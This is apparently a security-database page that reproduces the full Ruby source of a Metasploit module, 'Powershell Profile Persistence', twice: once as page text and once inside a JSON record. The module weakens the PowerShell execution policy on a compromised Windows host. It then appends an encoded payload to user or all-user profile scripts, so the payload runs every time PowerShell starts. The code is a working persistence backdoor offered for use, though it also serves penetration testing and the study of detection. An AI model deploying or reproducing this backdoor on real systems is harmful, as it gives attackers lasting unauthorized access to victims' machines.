Powershell Profile Persistence_MSF:EXPLOIT-WINDOWS-PERSISTENCE-POWERSHELL_PROFILE-

Description

This module establishes persistence by modifying a PowerShell profile script, which is automatically executed when PowerShell starts. The module supports multiple profile scopes current user or all users and safely backs up any existing profile prior...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-WINDOWS-PERSISTENCE-POWERSHELL_PROFILE-

Published Apr 15, 2026 at 19:02

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Exploit::Powershell
include Msf::Post::Windows::Registry
include Msf::Exploit::Local::Persistence
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Powershell Profile Persistence',
'Description' => %q{
This module establishes persistence by modifying a PowerShell profile script, which is automatically
executed when PowerShell starts. The module supports multiple profile scopes (current user or all users)
and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
},
'License' => MSF_LICENSE,
'Author' => [
'madefourit'
],
'Platform' => [ 'win' ],
'Arch' => [ARCH_X64, ARCH_X86],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'References' => [
['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
['ATT&CK', Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE],
[ 'URL', 'https://pentestlab.blog/2019/11/05/persistence-powershell-profile/']
],
'DisclosureDate' => '2019-11-05',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
}
)
)
register_options [
OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']]),
OptBool.new('CREATE', [false, 'If a profile file doesnt exist, create one.', false]),
OptBool.new('EXECUTIONPOLICY', [false, 'Attempt to update execution policy to execute .', true]),
]
end

def policy_allows_execution?
# Get-ExecutionPolicy -List has words, but when converting to json to read easily it gives numbers, so we have to map them back
execution_policies = cmd_exec('powershell -NoProfile -Command "$h = @{}; Get-ExecutionPolicy -List | ForEach-Object { $h[$_.Scope.ToString()] = $_.ExecutionPolicy.ToString() }; $h | ConvertTo-Json"')
begin
@policies = JSON.parse(execution_policies)
rescue JSON::ParserError
print_error("Failed to parse powershell execution policies: #{execution_policies}")
return false
end
['Unrestricted', 'RemoteSigned', 'Bypass'].include?(@policies['CurrentUser'])
end

def check
return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft').include?('PowerShell')

unless policy_allows_execution?
if datastore['EXECUTIONPOLICY']
return Msf::Exploit::CheckCode::Appears("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']}), will attempt to override")
else
return Msf::Exploit::CheckCode::Safe("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']}) doesn't allow script execution, try setting EXECUTIONPOLICY")
end
end
vprint_status("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']})")

CheckCode::Appears('Powershell is installed and exploitable on the target system')
end

def backdoor_profile(profile_file)
module_created_file = false
unless file?(profile_file)
if datastore['CREATE']
print_status("#{profile_file} does not exist, creating it...")
folders = profile_file.split('\\')[0..-2]
folders = folders.join('\\')
# we can't use mkdir here because register_dir_for_cleanup gets called, and we handle our own cleanups
unless directory?(folders)
cmd_exec("cmd /c \"md #{folders}\"")
@clean_up_rc << "rmdir #{folders.gsub('\\', '/')}\n"
end
unless write_file(profile_file, '') # write empty file so we can append later
print_error("Failed to create profile file at #{profile_file}")
return false
end
module_created_file = true
else
print_error("#{profile_file} does not exist and CREATE option is false")
return false
end
end

if module_created_file
@clean_up_rc << "rm #{profile_file.gsub('\\', '/')}\n"
else
pfile = read_file(profile_file)
if pfile.nil?
vprint_warning("Unable to read (and backup) existing profile file at #{profile_file}, continuing without backup")
else
backup_file = store_loot(
'powershell.profile',
'text/plain',
session,
pfile, profile_file.split('\\').last,
'powershell profile backup'
)

print_status("Created #{profile_file} backup: #{backup_file}")
@clean_up_rc << "upload #{backup_file} #{profile_file}\n"
end
end

pload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
splitter = '-c '
pload = pload.split(splitter)[1..] # remove all the powershell.exe and setup/run stuff, we only need the code bit here
pload = pload.join(splitter)[1..-2] # rejoin, then remove surrounding double quotes

vprint_status("Appending payload to #{profile_file}")
unless append_file(profile_file, "\n#{pload}\n")
print_error("Failed to append payload to #{profile_file}")
return false
end
true
end

def install_persistence
profiles = cmd_exec('powershell -NoProfile -Command "$PROFILE | Select-Object * | ConvertTo-Json"')
begin
profiles = JSON.parse(profiles)
rescue JSON::ParserError
fail_with(Failure::UnexpectedReply, "Failed to parse powershell profile paths: #{profiles}")
end
profiles = profiles.transform_keys { |k| k.to_s.upcase }

if !policy_allows_execution? && datastore['EXECUTIONPOLICY']
print_status('Updating Powershell execution policy for CurrentUser to RemoteSigned')
cmd_exec('powershell -NoProfile -Command "Set-ExecutionPolicy -Scope CurrentUser RemoteSigned"')
@clean_up_rc << "execute -f powershell -a \"-NoProfile -w hidden -Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
end

case datastore['PROFILE']
when 'AUTO'
['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|
unless profiles.key?(profile)
print_error("#{profile} not found in user's profiles")
next
end
success = backdoor_profile(profiles[profile])
break if success
end
when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'
unless profiles.key?(datastore['PROFILE'])
fail_with(Failure::UnexpectedReply, "#{datastore['PROFILE']} not found in user's profiles")
end
backdoor_profile(profiles[datastore['PROFILE']])
end
end
end

{
    "lastseen": "2026-04-15T19:28:04",
    "description": "This module establishes persistence by modifying a PowerShell profile script, which is automatically executed when PowerShell starts. The module supports multiple profile scopes current user or all users and safely backs up any existing profile prior...",
    "published": "2026-04-15T19:02:24",
    "modified": "2026-04-15T19:02:24",
    "type": "metasploit",
    "title": "Powershell Profile Persistence",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-WINDOWS-PERSISTENCE-POWERSHELL_PROFILE-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n  Rank = ExcellentRanking\n\n  include Msf::Post::File\n  include Msf::Exploit::Powershell\n  include Msf::Post::Windows::Registry\n  include Msf::Exploit::Local::Persistence\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Powershell Profile Persistence',\n        'Description' => %q{\n          This module establishes persistence by modifying a PowerShell profile script, which is automatically\n          executed when PowerShell starts. The module supports multiple profile scopes (current user or all users)\n          and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'madefourit'\n        ],\n        'Platform' => [ 'win' ],\n        'Arch' => [ARCH_X64, ARCH_X86],\n        'SessionTypes' => [ 'meterpreter' ],\n        'Targets' => [[ 'Auto', {} ]],\n        'References' => [\n          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],\n          ['ATT&CK', Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE],\n          [ 'URL', 'https://pentestlab.blog/2019/11/05/persistence-powershell-profile/']\n        ],\n        'DisclosureDate' => '2019-11-05',\n        'DefaultTarget' => 0,\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],\n          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\n        }\n      )\n    )\n    register_options [\n      OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']]),\n      OptBool.new('CREATE', [false, 'If a profile file doesnt exist, create one.', false]),\n      OptBool.new('EXECUTIONPOLICY', [false, 'Attempt to update execution policy to execute .', true]),\n    ]\n  end\n\n  def policy_allows_execution?\n    # Get-ExecutionPolicy -List has words, but when converting to json to read easily it gives numbers, so we have to map them back\n    execution_policies = cmd_exec('powershell -NoProfile -Command \"$h = @{}; Get-ExecutionPolicy -List | ForEach-Object { $h[$_.Scope.ToString()] = $_.ExecutionPolicy.ToString() }; $h | ConvertTo-Json\"')\n    begin\n      @policies = JSON.parse(execution_policies)\n    rescue JSON::ParserError\n      print_error(\"Failed to parse powershell execution policies: #{execution_policies}\")\n      return false\n    end\n    ['Unrestricted', 'RemoteSigned', 'Bypass'].include?(@policies['CurrentUser'])\n  end\n\n  def check\n    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\\\SOFTWARE\\\\Microsoft').include?('PowerShell')\n\n    unless policy_allows_execution?\n      if datastore['EXECUTIONPOLICY']\n        return Msf::Exploit::CheckCode::Appears(\"Powershell execution policy for CurrentUser (#{@policies['CurrentUser']}), will attempt to override\")\n      else\n        return Msf::Exploit::CheckCode::Safe(\"Powershell execution policy for CurrentUser (#{@policies['CurrentUser']}) doesn't allow script execution, try setting EXECUTIONPOLICY\")\n      end\n    end\n    vprint_status(\"Powershell execution policy for CurrentUser (#{@policies['CurrentUser']})\")\n\n    CheckCode::Appears('Powershell is installed and exploitable on the target system')\n  end\n\n  def backdoor_profile(profile_file)\n    module_created_file = false\n    unless file?(profile_file)\n      if datastore['CREATE']\n        print_status(\"#{profile_file} does not exist, creating it...\")\n        folders = profile_file.split('\\\\')[0..-2]\n        folders = folders.join('\\\\')\n        # we can't use mkdir here because register_dir_for_cleanup gets called, and we handle our own cleanups\n        unless directory?(folders)\n          cmd_exec(\"cmd /c \\\"md #{folders}\\\"\")\n          @clean_up_rc << \"rmdir #{folders.gsub('\\\\', '/')}\\n\"\n        end\n        unless write_file(profile_file, '') # write empty file so we can append later\n          print_error(\"Failed to create profile file at #{profile_file}\")\n          return false\n        end\n        module_created_file = true\n      else\n        print_error(\"#{profile_file} does not exist and CREATE option is false\")\n        return false\n      end\n    end\n\n    if module_created_file\n      @clean_up_rc << \"rm #{profile_file.gsub('\\\\', '/')}\\n\"\n    else\n      pfile = read_file(profile_file)\n      if pfile.nil?\n        vprint_warning(\"Unable to read (and backup) existing profile file at #{profile_file}, continuing without backup\")\n      else\n        backup_file = store_loot(\n          'powershell.profile',\n          'text/plain',\n          session,\n          pfile, profile_file.split('\\\\').last,\n          'powershell profile backup'\n        )\n\n        print_status(\"Created #{profile_file} backup: #{backup_file}\")\n        @clean_up_rc << \"upload #{backup_file} #{profile_file}\\n\"\n      end\n    end\n\n    pload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)\n    splitter = '-c '\n    pload = pload.split(splitter)[1..] # remove all the powershell.exe and setup/run stuff, we only need the code bit here\n    pload = pload.join(splitter)[1..-2] # rejoin, then remove surrounding double quotes\n\n    vprint_status(\"Appending payload to #{profile_file}\")\n    unless append_file(profile_file, \"\\n#{pload}\\n\")\n      print_error(\"Failed to append payload to #{profile_file}\")\n      return false\n    end\n    true\n  end\n\n  def install_persistence\n    profiles = cmd_exec('powershell -NoProfile -Command \"$PROFILE | Select-Object * | ConvertTo-Json\"')\n    begin\n      profiles = JSON.parse(profiles)\n    rescue JSON::ParserError\n      fail_with(Failure::UnexpectedReply, \"Failed to parse powershell profile paths: #{profiles}\")\n    end\n    profiles = profiles.transform_keys { |k| k.to_s.upcase }\n\n    if !policy_allows_execution? && datastore['EXECUTIONPOLICY']\n      print_status('Updating Powershell execution policy for CurrentUser to RemoteSigned')\n      cmd_exec('powershell -NoProfile -Command \"Set-ExecutionPolicy -Scope CurrentUser RemoteSigned\"')\n      @clean_up_rc << \"execute -f powershell -a \\\"-NoProfile -w hidden -Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\\\"\\n\"\n    end\n\n    case datastore['PROFILE']\n    when 'AUTO'\n      ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|\n        unless profiles.key?(profile)\n          print_error(\"#{profile} not found in user's profiles\")\n          next\n        end\n        success = backdoor_profile(profiles[profile])\n        break if success\n      end\n    when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'\n      unless profiles.key?(datastore['PROFILE'])\n        fail_with(Failure::UnexpectedReply, \"#{datastore['PROFILE']} not found in user's profiles\")\n      end\n      backdoor_profile(profiles[datastore['PROFILE']])\n    end\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/persistence/powershell_profile.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/windows/persistence/powershell_profile/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply